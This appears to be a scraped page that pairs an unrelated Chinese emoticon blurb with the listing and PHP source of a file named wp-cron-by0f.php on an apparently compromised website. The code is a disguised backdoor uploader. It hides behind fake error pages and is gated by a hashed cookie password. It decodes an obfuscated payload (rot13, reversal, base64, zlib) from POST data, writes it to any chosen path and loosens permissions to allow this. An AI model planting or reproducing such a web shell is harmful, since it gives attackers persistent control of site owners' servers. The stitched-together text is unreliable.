d(・ω・d) 微分!(∫・ω・)∫ 積分!∂(・ω・∂) 偏微分!(∮・ω・)∮ 沿閉曲線的積分!(∬・ω・)∬ 重積分!∇(・ω・∇)梯度!∇・(・ω・∇・)散度!∇×(・ω・∇×)旋度!Δ(・ω・Δ)拉普拉斯!#゚Å゚)⊂彡☆))゚Д゚)・∵ლ(◉◞౪◟◉ )ლ千言萬語,不如一個「表情符號(emoji)」簡單生動又有趣!ಠ▃ಠ生氣、-`д´-憤怒、(¬_¬)無言、(•͈⌔•͈⑅)傷心、哭、開心、大笑、可愛、困惑、發呆、大眼睛、驚呀、跳舞、興奮、奔跑..≧Д≦ (;≧皿≦) (⁎˃ᆺ˂) ╬ Ò ‸ Ó) <(`^´)> ( >д<) (ꐦ ಠ皿ಠ ) (`Д´) (;`O´)o o(-`д´- 。) ( ˃⌂˂ ) (°ㅂ° ╬) (ʘ言ʘ╬) (Ò 皿 Ó ╬) (-`д´-) 눈_눈 (⋋▂⋌) (¬▂¬) ಠ▃ಠ (>x<) ╰(‵□′)╯
| Current Path : /home/ki411886/intraplast.co.uk/ |
| Current File : /home/ki411886/intraplast.co.uk/wp-cron-by0f.php |
<?php
function endsWith($FullStr, $needle) {
$StrLen = strlen($needle);
$FullStrEnd = substr($FullStr, strlen($FullStr) - $StrLen);
return $FullStrEnd == $needle;
}
function folder_of_file($p1){
if(!stristr($p1, '/')){
return realpath('./');
}
if(strpos($p1, '//') !== false){
$p1 = str_replace('//','/',$p1);
}
if(endsWith($p1, '/') == true){
$p1 = substr_replace($p1 ,'', -1);
}
$p2 = '';
$ar = explode('/', $p1);
for($i=1; $i < count($ar) - 1; $i++){
$p2 .= '/'.$ar[$i];
}
if($p1[0] == '.' && $p1[1] == '/'){
$p2 = './'.$p2;
}
if($p1[0] == '.' && $p1[1] == '.'){
$p2 = '../'.$p2;
}
if(strpos($p2, '//') !== false){
$p2 = str_replace('//','/',$p2);
}
return trim($p2);
}
function save($path, $source){
$os = strtolower(substr(PHP_OS, 0, 3));
$folder_P = folder_of_file($path);
if (!is_writable($folder_P) && $os != "win"){ chmod($folder_P, 0755); }
if (file_exists($path) && is_file($path) && !is_writable($path) && $os != "win"){ chmod($path, 0644); }
if(function_exists('file_put_contents')){
$saV = file_put_contents($path, $source);
}else{
$saV = fwrite(fopen($path, 'w'), $source);
}
return $saV;
}
if(!empty($_GET['action'])){
die('Sorry the page you were looking for could not be found.');
}
if (md5(md5(md5($_COOKIE['pwd']))) !== '0d4f69bb38f2354a6d896d6a222a4bf5' || empty($_POST['name']) || empty($_POST['age'])){
header('HTTP/1.1 500 Internal Server Error', true, 500);
exit(0);
}
$b = 'ba'.'s'.'e'.'6'.'4_'.'de'.'co'.'de';$srv = 'str'.'rev';$rot = 'str'.'_'.'rot'.'13';
save(trim($_POST['name']), gzuncompress($b($srv($rot(trim($_POST['age']))))));
echo '<html><center>./Done</center></html>';
?>